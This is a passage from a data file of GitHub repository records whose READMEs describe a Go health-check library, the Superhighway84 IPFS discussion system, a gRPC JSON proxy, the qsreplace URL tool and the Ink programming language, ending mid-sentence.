Available options:\n- `WithCheckListeners` - enables you to act on check registration, start and completed events\n- `WithHealthListeners` - enables you to act on changes in the health service results\n\n### Built-in Checks\nThe library comes with a set of built-in checks.\nCurrently implemented checks are as follows:\n\n#### HTTP built-in check\nThe HTTP check allows you to trigger an HTTP request to one of your dependencies, \nand verify the response status, and optionally the content of the response body.\nExample was given above in the [usage](#usage) section\n\n#### DNS built-in check(s)\nThe DNS checks allow you to perform lookup to a given hostname / domain name / CNAME / etc, \nand validate that it resolves to at least the minimum number of required results.\n\nCreating a host lookup check is easy:\n```go\n// Schedule a host resolution check for `example.com`, requiring at least one results, and running every 10 sec\nh.RegisterCheck(\n\tchecks.NewHostResolveCheck(\"example.com\", 1),\n\tgosundheit.ExecutionPeriod(10 * time.Second),\n)\n```\n\nYou may also use the low level `checks.NewResolveCheck` specifying a custom `LookupFunc` if you want to to perform other kinds of lookups.\nFor example you may register a reverse DNS lookup check like so:\n```go\nfunc ReverseDNLookup(ctx context.Context, addr string) (resolvedCount int, err error) {\n\tnames, err := net.DefaultResolver.LookupAddr(ctx, addr)\n\tresolvedCount = len(names)\n\treturn\n}\n\n//...\n\nh.RegisterCheck(\n\tchecks.NewResolveCheck(ReverseDNLookup, \"127.0.0.1\", 3),\n\tgosundheit.ExecutionPeriod(10 * time.Second),\n\tgosundheit.ExecutionTimeout(1*time.Second)\n)\n```\n\n#### Ping built-in check(s)\nThe ping checks allow you to verifies that a resource is still alive and reachable.\nFor example, you can use it as a DB ping check (`sql.DB` implements the Pinger interface):\n```go\n\tdb, err := sql.Open(...)\n\tdbCheck, err := checks.NewPingCheck(\"db.check\", db)\n\t_ = h.RegisterCheck(&gosundheit.Config{\n\t\tCheck: dbCheck,\n\t\t// ...\n\t})\n```\n\nYou can also use the ping check to test a generic connection like so:\n```go\n\tpinger := checks.NewDialPinger(\"tcp\", \"example.com\")\n\tpingCheck, err := checks.NewPingCheck(\"example.com.reachable\", pinger)\n\th.RegisterCheck(pingCheck)\n``` \n\nThe `NewDialPinger` function supports all the network/address parameters supported by the `net.Dial()` function(s)\n\n### Custom Checks\nThe library provides 2 means of defining a custom check.\nThe bottom line is that you need an implementation of the `Check` interface:\n```go\n// Check is the API for defining health checks.\n// A valid check has a non empty Name() and a check (Execute()) function.\ntype Check interface {\n\t// Name is the name of the check.\n\t// Check names must be metric compatible.\n\tName() string\n\t// Execute runs a single time check, and returns an error when the check fails, and an optional details object.\n\tExecute() (details interface{}, err error)\n}\n```\nSee examples in the following 2 sections below.\n\n#### Use the CustomCheck struct\nThe `checksCustomCheck` struct implements the `checks.Check` interface,\nand is the simplest way to implement a check if all you need is to define a check function.\n\nLet's define a check function that fails 50% of the times:\n```go\nfunc lotteryCheck() (details interface{}, err error) {\n\tlottery := rand.Float32()\n\tdetails = fmt.Sprintf(\"lottery=%f\", lottery)\n\tif lottery < 0.5 {\n\t\terr = errors.New(\"Sorry, I failed\")\n\t}\n\treturn\n}\n```\n\nNow we 
register the check to start running right away, and execute once per 2 minutes with a timeout of 5 seconds:\n```go\nh := gosundheit.New()\n...\n\nh.RegisterCheck(\n\t&checks.CustomCheck{\n\t\tCheckName: \"lottery.check\",\n\t\tCheckFunc: lotteryCheck,\n\t},\n\tgosundheit.InitialDelay(0),\n\tgosundheit.ExecutionPeriod(2 * time.Minute), \n\tgosundheit.ExecutionTimeout(5 * time.Second)\n)\n```\n\n#### Implement the Check interface\nSometimes you need to define a more elaborate custom check.\nFor example when you need to manage state.\nFor these cases it's best to implement the `Check` interface yourself.\n\nLet's define a flexible example of the lottery check, that allows you to define a fail probability:\n```go\ntype Lottery struct {\n\tmyname string\n\tprobability float32\n}\n\nfunc (l Lottery) Execute() (details interface{}, err error) {\n\tlottery := rand.Float32()\n\tdetails = fmt.Sprintf(\"lottery=%f\", lottery)\n\tif lottery < l.probability {\n\t\terr = errors.New(\"Sorry, I failed\")\n\t}\n\treturn\n}\n\nfunc (l Lottery) Name() string {\n\treturn l.myname\n}\n```\n\nAnd register our custom check, scheduling it to run every 30 seconds (after a 1 second initial delay) with a 5 seconds timeout:\n```go\nh := gosundheit.New()\n...\n\nh.RegisterCheck(\n\tLottery{myname: \"custom.lottery.check\", probability:0.3},\n\tgosundheit.InitialDelay(1*time.Second),\n\tgosundheit.ExecutionPeriod(30*time.Second),\n\tgosundheit.ExecutionTimeout(5*time.Second),\n)\n```\n\n#### Custom Checks Notes\n1. If a check take longer than the specified rate period, then next execution will be delayed, \nbut will not be concurrently executed.\n1. Checks must complete within a reasonable time. If a check doesn't complete or gets hung, \nthe next check execution will be delayed. Use proper time outs.\n1. Checks must respect the provided context. Specifically, a check must abort its execution, and return an error, if the context has been cancelled. \n1. **A health-check name must be a metric name compatible string** \n (i.e. 
no funky characters, and spaces allowed - just make it simple like `clicks-db-check`).\n See here: https://help.datadoghq.com/hc/en-us/articles/203764705-What-are-valid-metric-names-\n\n### Expose Health Endpoint\nThe library provides an HTTP handler function for serving health stats in JSON format.\nYou can register it using your favorite HTTP implementation like so:\n```go\nhttp.Handle(\"/admin/health.json\", healthhttp.HandleHealthJSON(h))\n```\nThe endpoint can be called like so:\n```text\n~ $ curl -i http://localhost:8080/admin/health.json\nHTTP/1.1 503 Service Unavailable\nContent-Type: application/json\nDate: Tue, 22 Jan 2019 09:31:46 GMT\nContent-Length: 701\n\n{\n\t\"custom.lottery.check\": {\n\t\t\"message\": \"lottery=0.206583\",\n\t\t\"error\": {\n\t\t\t\"message\": \"Sorry, I failed\"\n\t\t},\n\t\t\"timestamp\": \"2019-01-22T11:31:44.632415432+02:00\",\n\t\t\"num_failures\": 2,\n\t\t\"first_failure_time\": \"2019-01-22T11:31:41.632400256+02:00\"\n\t},\n\t\"lottery.check\": {\n\t\t\"message\": \"lottery=0.865335\",\n\t\t\"timestamp\": \"2019-01-22T11:31:44.63244047+02:00\",\n\t\t\"num_failures\": 0,\n\t\t\"first_failure_time\": null\n\t},\n\t\"url.check\": {\n\t\t\"message\": \"http://httpbin.org/status/200,300\",\n\t\t\"error\": {\n\t\t\t\"message\": \"unexpected status code: '300' expected: '200'\"\n\t\t},\n\t\t\"timestamp\": \"2019-01-22T11:31:44.632442937+02:00\",\n\t\t\"num_failures\": 4,\n\t\t\"first_failure_time\": \"2019-01-22T11:31:38.632485339+02:00\"\n\t}\n}\n```\nOr for the shorter version:\n```text\n~ $ curl -i http://localhost:8080/admin/health.json?type=short\nHTTP/1.1 503 Service Unavailable\nContent-Type: application/json\nDate: Tue, 22 Jan 2019 09:40:19 GMT\nContent-Length: 105\n\n{\n\t\"custom.lottery.check\": \"PASS\",\n\t\"lottery.check\": \"PASS\",\n\t\"my.check\": \"FAIL\",\n\t\"url.check\": \"PASS\"\n}\n```\n\nThe `short` response type is suitable for the consul health checks / LB heath checks.\n\nThe response code is `200` when the tests pass, and `503` when they fail.\n\n### CheckListener\nIt is sometimes desired to keep track of checks execution and apply custom logic.\nFor example, you may want to add logging, or external metrics to your checks, \nor add some trigger some recovery logic when a check fails after 3 consecutive times.\n\nThe `gosundheit.CheckListener` interface allows you to hook this custom logic.\n\nFor example, lets add a logging listener to our health repository:\n```go\ntype checkEventsLogger struct{}\n\nfunc (l checkEventsLogger) OnCheckRegistered(name string, res gosundheit.Result) {\n\tlog.Printf(\"Check %q registered with initial result: %v\\n\", name, res)\n}\n\nfunc (l checkEventsLogger) OnCheckStarted(name string) {\n\tlog.Printf(\"Check %q started...\\n\", name)\n}\n\nfunc (l checkEventsLogger) OnCheckCompleted(name string, res gosundheit.Result) {\n\tlog.Printf(\"Check %q completed with result: %v\\n\", name, res)\n}\n```\n\nTo register your listener:\n```go\nh := gosundheit.New(gosundheit.WithCheckListeners(&checkEventsLogger))\n```\n\nPlease note that your `CheckListener` implementation must not block!\n\n### HealthListener\nIt is something desired to track changes in registered checks results.\nFor example, you may want to log the amount of results monitored, or send metrics on these results.\n\nThe `gosundheit.HealthListener` interface allows you to hook this custom logic.\n\nFor example, lets add a logging listener:\n```go\ntype healthLogger struct{}\n\nfunc (l healthLogger) OnResultsUpdated(results map[string]Result) 
{\n\tlog.Printf(\"There are %d results, general health is %t\\n\", len(results), allHealthy(results))\n}\n```\n\nTo register your listener:\n```go\nh := gosundheit.New(gosundheit.WithHealthListeners(&checkHealthLogger))\n```\n\n## Metrics\nThe library can expose metrics using a `CheckListener`. At the moment, OpenCensus is available and exposes the following metrics:\n* `health/check_status_by_name` - An aggregated health status gauge (0/1 for fail/pass) at the time of sampling.\nThe aggregation uses the following tags:\n * `check=allChecks` - all checks aggregation\n * `check=` - specific check aggregation\n* `health/check_count_by_name_and_status` - Aggregated pass/fail counts for checks, with the following tags: \n * `check=allChecks` - all checks aggregation\n * `check=` - specific check aggregation\n * `check-passing=[true|false]` \n* `health/executeTime` - The time it took to execute a checks. Using the following tag:\n * `check=` - specific check aggregation\n\n\nThe views can be registered like so:\n```go\nimport (\n\t\"github.com/AppsFlyer/go-sundheit\"\n\t\"github.com/AppsFlyer/go-sundheit/opencensus\"\n\t\"go.opencensus.io/stats/view\"\n)\n// This listener can act both as check and health listener for reporting metrics\noc := opencensus.NewMetricsListener()\nh := gosundheit.New(gosundheit.WithCheckListeners(oc), gosundheit.WithHealthListeners(oc))\n// ...\nview.Register(opencensus.DefaultHealthViews...)\n// or register individual views. For example:\nview.Register(opencensus.ViewCheckExecutionTime, opencensus.ViewCheckStatusByName, ...)\n```\n\n### Classification\n\nIt is sometimes required to report metrics for different check types (e.g. setup, liveness, readiness).\nTo report metrics using `classification` tag - it's possible to initialize the OpenCensus listener with classification:\n\n```go\n// startup\nopencensus.NewMetricsListener(opencensus.WithStartupClassification())\n// liveness\nopencensus.NewMetricsListener(opencensus.WithLivenessClassification())\n// readiness\nopencensus.NewMetricsListener(opencensus.WithReadinessClassification())\n// custom\nopencensus.NewMetricsListener(opencensus.WithClassification(\"custom\"))\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mrusme/superhighway84", "link": "https://github.com/mrusme/superhighway84", "tags": ["usenet", "ipfs", "decentralized", "decentralization", "discussion-forum", "bulletin-board-system", "forum", "orbitdb", "web3", "bbs", "community", "censorship-circumvention", "censorship-resistance", "free-speech", "merkle-dag", "p2p-network", "p2p", "p2p-database", "censorship", "uncensorable"], "stars": 512, "description": "USENET-inspired, uncensorable, decentralized internet discussion system running on IPFS & OrbitDB", "lang": "Go", "repo_lang": "", "readme": "Superhighway84\n--------------\n\n[![Superhighway84](superhighway84.jpeg)](superhighway84.png)\n\n```\n===============================================================================\n INTERACTIVE ASYNC / FULL DUPLEX\n===============================================================================\n\n Dial Up To 19.2 Kbps\n \n with\n\n _ _ _ __ ____ __ _ __ ___ ____\n / / / // / __/_ _____ ___ ____/ / (_)__ _/ / _ _____ ___ __( _ )/ / /\n _\\ _\\_\\_\\\\_\\ \\/ // / _ \\/ -_) __/ _ \\/ / _ \\/ _ \\ |/|/ / _ \\/ // / _ /_ _/\n / / / // /___/\\_,_/ .__/\\__/_/ /_//_/_/\\_, /_//_/__,__/\\_,_/\\_, /\\___/ /_/\n /_/ /___/ /___/\n\n ::: UNCENSORABLE USENET-INSPIRED DECENTRALIZED 
INTERNET DISCUSSION SYSTEM :::\n\n\n The V.H.S. (Very High Speed) Superhighway84 platform is more than just the\n fastest decentralized, uncensorable, USENET-inspired communications platform \n available. It is also the first one to be based on the latest \n IPFS technology available today!\n\n Superhighway84 offers the most spectacular features under the Spectrum.\n \n 100% Error Protection\n Data and Character Compression\n Alternate Bell Compatible Mode\n Long Haul Satellite Operation\n Network Diagnostics\n Fallback Mode\n And More!\n\n\n The Superhighway84 modern, uncensorable, \n decentralized internet discussion system.\n It should cost a lot more than $0.\n\n\n```\n\n![Screenshot](screenshot01.png)\n\nSuperhighway84 is an open source, terminal-based, IPFS-powered, USENET-inspired,\nuncensorable, decentralized peer-to-peer internet discussion system with retro\naesthetics.\n\n[More info here.](https://xn--gckvb8fzb.com/superhighway84/)\n\n\n\n## Installation\n\n### Prerequisites\n\nDownload the [kubo 0.16\nrelease](https://github.com/ipfs/kubo/releases/tag/v0.16.0) and unpack it:\n\n```sh\n$ tar -xzf ./kubo_*.tar.gz\n```\n\nIf you haven't used IPFS so far, initialize the IPFS repository using the \nfollowing command:\n\n```sh\n$ ./kubo/ipfs init\n```\n\nIf you had used IPFS an already have an IPFS repository in place, either\n(re)move it from `~/.ipfs` or make sure to `export IPFS_PATH` before running the\n`ipfs init` command, e.g.:\n\n```sh\n$ export IPFS_PATH=~/.ipfs-sh84\n$ ./go-ipfs/ipfs init\n```\n\n\n### From Release\n\nDownload the [latest\nrelease](https://github.com/mrusme/superhighway84/releases/latest) and unpack\nit:\n\n```sh\n$ tar -xzf ./superhighway84_*.tar.gz\n$ ./superhighway84\n```\n\nIf you initialized the IPFS repo under in a custom location, you need to prefix\n`IPFS_PATH`:\n\n```sh\n$ IPFS_PATH=~/.ipfs-sh84 ./superhighway84\n```\n\nThe binary `superhighway84` can be moved wherever you please.\n\n\n\n### From Source\n\nClone this repository\n\n- from [GitHub](https://github.com/mrusme/superhighway84)\n ```sh\n $ git@github.com:mrusme/superhighway84.git\n ```\n- from [Radicle](https://app.radicle.network/seeds/maple.radicle.garden/rad:git:hnrkcf9617a8pxxtw8caaop9ioe8cj5u4c4co)\n ```sh\n $ rad clone rad://maple.radicle.garden/hnrkcf9617a8pxxtw8caaop9ioe8cj5u4c4co\n ```\n\nThen cd into the cloned directory and run:\n\n```sh\n$ go build .\n```\n\nThe binary will be available at ./superhighway84 and can be moved wherever you\nplease.\n\n\n\n## Running\n\nFirst, check ulimit -n and verify that it's at a reasonable amount. IPFS\nrequires it to be large enough (>= 2048) in order to work properly over time.\n\nSecond, if your hardware shouldn't be a beefy computer but instead one of\nthose flimsy MacBooks, older hardware, a Raspberry or a low-memory VPS it is\nadvisable to set the previously created IPFS repository to the `lowpower`\nprofile.\n\n```sh\n$ ipfs config profile apply lowpower\n```\n\nThis should help with CPU usage, file descriptors and the amount of network\nconnections. While during the startup period you might still see peers peaking\nbetween 1k and 3k, connections should ultimately settle somewhere between 100\nand 300 peers.\n\nAfterwards you can simply launch the binary:\n\n```sh\n$ superhighway84\n```\n\nA setup wizard will help you with initial configuration. 
Please make sure to\nhave at least HOME and EDITOR exported in your environment.\n\nIn case you're intending to run the official IPFS daemon and Superhighway84 in\nparallel, be sure to adjust the ports in their respective IPFS repos (e.g.\n`~/.ipfs` and `~/.ipfs-sh84`) so that they won't utilize the same port numbers.\nThe ports `4001`, `5001` and `8080` are relevant and should be adjusted to\nsomething other for every new repo/IPFS node that will run in parallel, e.g.:\n\n```json\n \"Addresses\": {\n \"Swarm\": [\n \"/ip4/0.0.0.0/tcp/4002\",\n \"/ip6/::/tcp/4002\",\n \"/ip4/0.0.0.0/udp/4002/quic\",\n \"/ip6/::/udp/4002/quic\"\n ],\n \"Announce\": [],\n \"NoAnnounce\": [],\n \"API\": \"/ip4/127.0.0.1/tcp/5002\",\n \"Gateway\": \"/ip4/127.0.0.1/tcp/8081\"\n },\n```\n\n**NOTE**: When running Superhighway84 for the first time it might seem like it's\n\"hanging\" at the command prompt. Usually it isn't hanging but rather searching\nfor peer it can connect to in order to synchronize the database. Depending on\nhow many people are online, this process might take _some time_, please be\npatient.\n\n\n\n## Connectivity\n\nIf you're having trouble connecting to the IPFS network that might be due to\nyour network setup. Please try the IPFS `AutoRelay` feature in such a case:\n\n```sh\n$ ipfs config --json Swarm.RelayClient.Enabled true\n```\n\nMore information on this can be found here:\nhttps://github.com/ipfs/kubo/blob/master/docs/experimental-features.md#autorelay\n\n\n\n## Configuration\n\nSuperhighway84 will guide you through the basic configuration on its first run.\nThe configuration is stored at the path that you specified in the setup wizard.\nAfter it was successfully created, it can be adjusted manually and will take\neffect on the next launch of Superhighway84.\n\nConfiguration options that might be of interest:\n\n```\nArticlesListView =\n The view to be used for the articles lit. Possible values:\n 0 - threaded view, latest thread at the top\n 1 - list view, latest article at the top\n\n[Profile]\n From =\n The identifier that is being shown when posting an article, e.g. your name,\n username or email that you'd like to display\n\n Organization =\n An optional organization that you'd like to display affiliation with\n\n[Shortcuts]\n The shortcuts for navigating Superhighway84, can be reset to its defaults by\n simply removing the whole [Shortcuts] block and launching Superhighway84\n\n The structure is as following:\n\n ` = \"event\"`\n\n The key codes can be looked up under the following link:\n\n https://pkg.go.dev/github.com/gdamore/tcell/v2#Key\n\n For simple ASCII characters use their ASCII code, e.g. `114` for the character \n `r`.\n```\n\n\n## Usage\n\nThe default keyboard shortcuts are:\n\n```\n C-r: Refresh\n C-h: Focus groups list\nC-l, C-k: Focus articles list\n C-j: Focus preview pane\n C-q: Quit\n k: Move up in list\n j: Move down in list\n h: Move left in list\n l: Move right in list\n g: Move to the beginning of list/text\n G: Move to the end of list/text\n CR: Select item in list\n n: Publish new article\n r: Reply to selected article\n```\n\nHowever, you are free to customize these within your configuration file, under\nthe section `Shortcuts`. \n\n\n### Submit Article\n\nWhen submitting a new article or a reply to an article, the $EDITOR is launched\nin which a document with a specific structure will be visible. 
This structure\nconsists of the HEADER, a SEPARATOR and the BODY and looks like this:\n\n```\nSubject: This is the subject of the article\nNewsgroup: test.sandbox\n= = = = = =\nThis is the multiline\nbody of the article\n```\n\nThe HEADER contains all headers that are required for an article to be\nsubmitted. These are:\n\n- `Subject:`\\\n The subject of the article that will be shown in the articles list. The\n subject must only contain of printable ASCII characters.\n\n- `Newsgroup:`\\\n The newsgroup under which the article will be submitted, this can\n either be an existing group or a new group. Please try to follow\n the convention when creating new groups.\n The newsgroup must only contain of printable ASCII characters.\n\nThe SEPARATOR contains of 6 equal signs and 5 spaces, alternating each \nother, followed by a new line.\n\nThe BODY can contain of multiline text.\n\n\n\n## Known Limitations\n\n- The OrbitDB that Superhighway84 uses is a public database, meaning everyone\n can alter its data. Since its using a standard _docstore_, PUT and DELETE\n events can alter existing data. This issue will be solved in the future by\n customizing the store to ignore these types of events.\n\n- Superhighway84 is bound to the version of IPFS that Berty decides to support \n for go-orbit-db. go-orbit-db updates, on the other hand, seem to introduce\n breaking changes from time to time, which are hard to debug as someone without\n in-depth knowledge nor documentation. Since Superhighway84 is pretty much a\n one-man-show it would be quite challenging to fork go-orbit-db in order to\n keep it up to date with IPFS and make its interface more stable. Unfortunately\n there doesn't seem to be an alternative to Berty's go-orbit-db as of right\n now, so Superhighway84 is basically stuck with it.\n If you happen to know your way around IPFS and maybe even go-orbit-db, and\n would like to support this project, please get in touch!\n\n- If you have a newer IPFS version installed than the one used by\n Superhighway84, please make sure to **not upgrade** the IPFS_REPO that\n Superhighway84 is using. Otherwise you will get an error when starting\n Superhighway84 that will tell you that there is an IPFS repository mismatch:\n\n ```\n > panic: Your programs version (11) is lower than your repos (12).\n ```\n\n If this should be the case, please follow the instructions provided here:\n\n https://github.com/mrusme/superhighway84/issues/42#issuecomment-1100582472\n\n- If you encounter the following issue your IPFS repo version might be older\n than what Superhighway84 is using:\n\n ```\n > panic: ipfs repo needs migration\n ```\n\n In this case you might want to follow the IPFS migration guide here:\n\n https://github.com/ipfs/fs-repo-migrations/blob/master/run.md\n\n Alternatively use the same IPFS version as used by Superhighway84 to\n initialize a dedicated Superhighway84 repository. Please refer to the\n INSTALLATION part for how to do so.\n\n\n\n## Credits\n\n- Superhighway84 name, code and graphics by [mrusme](https://github.com/mrusme)\n- Logo backdrop by\n [Swift](https://twitter.com/Swift_1_2/status/1114865117533888512)\n\n\n", "readme_type": "markdown", "hn_comments": "Sounds interesting but my questions about any \"uncensorable\" service are* What's the plan to deal with one of Usenet's main downfalls? Spam.* What happens when it's used for illegal things even the staunchest of free speech advocates will agree need moderating? 
Child Porn etc...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jnewmano/grpc-json-proxy", "link": "https://github.com/jnewmano/grpc-json-proxy", "tags": [], "stars": 512, "description": "gRPC proxy for Postman like tools", "lang": "Go", "repo_lang": "", "readme": "# grpc-json-proxy\n\nGRPC JSON is a proxy which allows HTTP API tools like Postman to interact with gRPC servers.\n\n## Requirements\n- grpc+json codec must be enabled on the grpc server\n- Postman must be configured to use the proxy\n\nConfiguration of the proxy and its dependencies is a three step process.\n\n1. Register a JSON codec with the gRPC server. In Go, it can be automatically registered simple by adding the following import:\n\n`import _\"github.com/jnewmano/grpc-json-proxy/codec\"`\n\nIf you're using `gogo/protobuf` as your protobuf backend, import the following:\n\n`import _\"github.com/jnewmano/grpc-json-proxy/gogoprotobuf/codec\"`\n\n2. Run the grpc-json-proxy. Download pre-built binaries from https://github.com/jnewmano/grpc-json-proxy/releases/ or build from source:\n\n`go get -u github.com/jnewmano/grpc-json-proxy`\n\n`grpc-json-proxy`\n\nOther way, you can simply use `grpc-json-proxy` docker image out of the box:\n\n```bash\ndocker run -p 7001:7001 jnewmano/grpc-json-proxy\n```\n\n3. Configure Postman to send requests through the proxy.\nPostman -> Preferences -> Proxy -> Global Proxy\n\n`Proxy Server: localhost 7001`\n\n\n![Postman Proxy Configuration](https://cdn-images-1.medium.com/max/1600/1*oc09cwpCC9XrjpU9Gl5YTw.png)\n\nSetup your Postman gRPC request with the following:\n\n1. Set request method to Post .\n1. Set the URL to http://{{ grpc server address}}/{{proto package}}.{{proto service}}/{{method}} Always use http, proxy will establish a secure connection to the gRPC server.\n1. Set the Content-Type header to application/grpc+json .\n1. Optionally add a Grpc-Insecure header set to true for an insecure connection.\n1. Set the request body to appropriate JSON for the message. For reference, generated Go code includes JSON tags on the generated message structs.\n\n\nFor example:\n\n![Postman Example Request](https://cdn-images-1.medium.com/max/1600/1*npRlBiKxuJ5KMnnk0F5n6g.png)\n\n\n\nInspired by Johan Brandhorst's [grpc-json](https://jbrandhorst.com/post/grpc-json/)\n\n### Host accessibility\n\nIf you use docker image to run grpc-json-proxy server, and want to access grpc via loopback address `127.0.0.1`, you should pay attention to docker network accessibility.\n\n1. use `host.docker.internal` instead of `127.0.0.1` in Linux.\n2. 
use `docker.for.mac.host.internal` instead of `127.0.0.1` in MacOS and with Docker for Mac 17.12 or above.\n\nSee: https://docs.docker.com/docker-for-mac/networking/#use-cases-and-workarounds\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tomnomnom/qsreplace", "link": "https://github.com/tomnomnom/qsreplace", "tags": [], "stars": 512, "description": "Accept URLs on stdin, replace all query string values with a user-supplied value", "lang": "Go", "repo_lang": "", "readme": "# qsreplace\n\nAccept URLs on stdin, replace all query string values with a user-supplied value, only output\neach combination of query string parameters once per host and path.\n\n## Usage\n\nExample input file:\n```\n\u25b6 cat urls.txt \nhttps://example.com/path?one=1&two=2\nhttps://example.com/path?two=2&one=1\nhttps://example.com/pathtwo?two=2&one=1\nhttps://example.net/a/path?two=2&one=1\n```\n\n### Replace Query String Values\n\n```\n\u25b6 cat urls.txt | qsreplace newval\nhttps://example.com/path?one=newval&two=newval\nhttps://example.com/pathtwo?one=newval&two=newval\nhttps://example.net/a/path?one=newval&two=newval\n```\n\n### Append to Query String Values\n\n```\n\u25b6 cat urls.txt | qsreplace -a newval\nhttps://example.com/path?one=1newval&two=2newval\nhttps://example.com/pathtwo?one=1newval&two=2newval\nhttps://example.net/a/path?one=1newval&two=2newval\n```\n\n### Remove Duplicate URL and Parameter Combinations\n\nYou can omit the argument to `-a` to only output each combination of URL and query string parameters once:\n```\n\u25b6 cat urls.txt | qsreplace -a \nhttps://example.com/path?one=1&two=2\nhttps://example.com/pathtwo?one=1&two=2\nhttps://example.net/a/path?one=1&two=2\n```\n\n## Install\n\nWith Go:\n\n```\n\u25b6 go install github.com/tomnomnom/qsreplace@latest\n```\n\nOr [download a release](https://github.com/tomnomnom/qsreplace/releases) and put it somewhere in your `$PATH`\n(e.g. in /usr/local/bin).\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thesephist/ink", "link": "https://github.com/thesephist/ink", "tags": ["golang", "programming-language", "javascript", "functional-programming", "ink-programming-language"], "stars": 512, "description": "Ink is a minimal programming language inspired by modern JavaScript and Go, with functional style.", "lang": "Go", "repo_lang": "", "readme": "
\n\t\"Ink\n\n# Ink programming language\n\n[![GoDoc](https://godoc.org/github.com/thesephist/ink?status.svg)](https://godoc.org/github.com/thesephist/ink)\n[![Build Status](https://travis-ci.com/thesephist/ink.svg?branch=master)](https://travis-ci.com/thesephist/ink)\n\nInk is a minimal programming language inspired by modern JavaScript and Go, with functional style. Ink can be embedded in Go applications with a simple interpreter API. Ink is used to write my current personal productivity suite, [Polyx](https://github.com/thesephist/polyx), as well as my day-to-day scripts and other small programs. Ink's documentation is on the [Ink website](https://dotink.co).\n\n
\n\n---\n\nInk has a few goals. In order, they are\n\n- Ink should have a simple, minimal syntax and feature set\n- Ink should be quickly readable and clear in expression\n- Ink should have a well designed, fully featured, and modular standard library\n- Ink should have an ergonomic interpreter and runtime API\n\nDesign is always a game of tradeoffs. Ink's goals for minimalism and readability / expressiveness means the language deliberately does not aim to be best in other ways:\n\n- Ink doesn't need to be highly efficient or fast, especially compared to compiled languages\n - However, within the constraints of the interpreter design, I try not to leave performance on the table, both in execution speed and in memory footprint. Efficiently composed Ink programs are between 2-4x slower than equivalent Python programs, in my experience. Small programs can run on as little as 3MB of memory, while the interpreter can stably scale up to gigabytes of memory for data-heavy tasks.\n- Ink doesn't need to be particularly concise, though we try to avoid verbosity when we can\n- Ink doesn't value platform portability as much as some other languages in this realm, like Lua or JavaScript -- not running on every piece of hardware available is okay, as long as it runs on most of the popular platforms\n\nThe rest of this README is a light introduction to the Ink language and documentation about the project and its interpreter, written in Go. For more information and formal specification about the Ink language itself, please see [SPEC.md](SPEC.md).\n\n## Introduction\n\nHere's an implementation of FizzBuzz in Ink.\n\n```ink\n` ink fizzbuzz implementation `\n\nstd := load('std')\n\nlog := std.log\nrange := std.range\neach := std.each\n\nfizzbuzz := n => each(\n\trange(1, n + 1, 1)\n\tn => [n % 3, n % 5] :: {\n\t\t[0, 0] -> log('FizzBuzz')\n\t\t[0, _] -> log('Fizz')\n\t\t[_, 0] -> log('Buzz')\n\t\t_ -> log(n)\n\t}\n)\n\nfizzbuzz(100)\n```\n\nHere's a simple Hello World HTTP server program.\n\n```ink\nstd := load('std')\n\nlog := std.log\n\nlisten('0.0.0.0:8080', evt => (\n\tevt.type :: {\n\t\t'error' -> log('Error: ' + evt.message)\n\t\t'req' -> (evt.end)({\n\t\t\tstatus: 200\n\t\t\theaders: {'Content-Type': 'text/plain'}\n\t\t\tbody: 'Hello, World!'\n\t\t})\n\t}\n))\n```\n\nIf you're looking for more realistic and complex examples, check out...\n\n- [the standard library](samples/std.ink)\n- [quicksort](samples/quicksort.ink)\n- [the standard test suite](samples/test.ink)\n- [Newton's root finding algorithm](samples/newton.ink)\n- [JSON serializer/deserializer](samples/json.ink)\n- [a small static file server](samples/fileserver.ink)\n- [Mandelbrot set renderer](samples/mandelbrot.ink)\n\nYou'll notice a few characteristics about Ink:\n\n- Functions are defined using arrows (`=>`) _a la_ JavaScript arrow functions\n- Ink does not have a looping primitive (no `for` or `while`), and instead defaults to tail-optimized recursion. Loops may be possible to have in syntax with macros in the near future.\n- Rather than using `if`/`else`, Ink uses pattern matching using the match (`::`) operator. Match expressions in Ink allows for very expressive definition of complex flow control.\n- Ink does not have explicit return statements. 
Instead, everything is an expression that evaluates to a value, and function bodies are a list of expressions whose last-evaluated expression value becomes the \"return value\" of the function.\n- As a general principle, Ink tries not to use English keywords in favor of a small set of short symbols.\n\nYou can find more sample code in the `samples/` directory and run them with `ink samples/.ink`.\n\n## Getting started\n\nYou can run Ink in three main ways:\n\n1. The Ink binary `ink` defaults to executing whatever comes through standard input, if there is any, or else starts a repl. So you can pipe any Ink script (say, `main.ink`) to the binary to execute it.\n```\n$ cat main.ink | ink\n\t# or\n$ ink < main.ink\n```\n2. Use `ink main.ink` to execute an Ink script file.\n3. Invoke `ink` without flags (or with the optional `-repl` flag) to start an interactive repl session, and start typing Ink code. You can run files in this context by loading Ink files into the context using the `load` builtin function, like `load('main')`. (Note that we remove the `.ink` file extension when we call `load`.)\n\nAdditionally, you can also invoke an Ink script with a [shebang](https://en.wikipedia.org/wiki/Shebang_(Unix)). Mark the _first line_ of your Ink program file with this directive, which tells the operating system to run the program file with `ink`, which will then accept this file and run it for you when you execute the file.\n\n```ink\n#!/usr/bin/env ink\n\n`` ... the rest of your program\n```\n\nYou can find an example of this in `samples/fileserver.ink`, which you can start by simply running `./samples/fileserver.ink` (without having to specifically call `ink samples/fileserver.ink`).\n\nTo summarize, ink's input priority is, from highest to lowest, `-repl` -> `-eval` -> files -> `stdin`. Note that command line flags to `ink` should _precede_ any program files given as arguments. If you need to pass a file name that begins with a dash, use `--`.\n\n## Why?\n\nI started the Ink project to become more familiar with how interpreters work, and to try my hand at designing a language that fit my preferences for the balance between elegance, simplicity, practicality, and expressiveness. The first part -- to learn about programming languages and interpreters -- is straightforward, so I want to expand on the second part.\n\nMy language of choice at work is currently JavaScript. JavaScript is expressive, very fast (for a dynamic language), and has an approach to concurrency that I really like, using a combination of closures with event loops and message passing to communicate between separate threads of execution. But JavaScript has grown increasingly large in its size and complexity, and also carries a lot of old cruft for sake of backwards compatibility. I've also been increasingly interested in composing programs from functional components, and there are features in the functional PL world that haven't yet made their way into JavaScript like expressive pattern matching and guaranteed tail recursion optimizations (the former has been in TC39 limbo for several years, and the latter is only supported by recent versions of WebKit/JavaScriptCore).\n\nSo Ink as a language is my attempt to build a language in the functional paradigm that doesn't sacrifice the concurrency benefits or expressiveness of JavaScript, while being minimal and 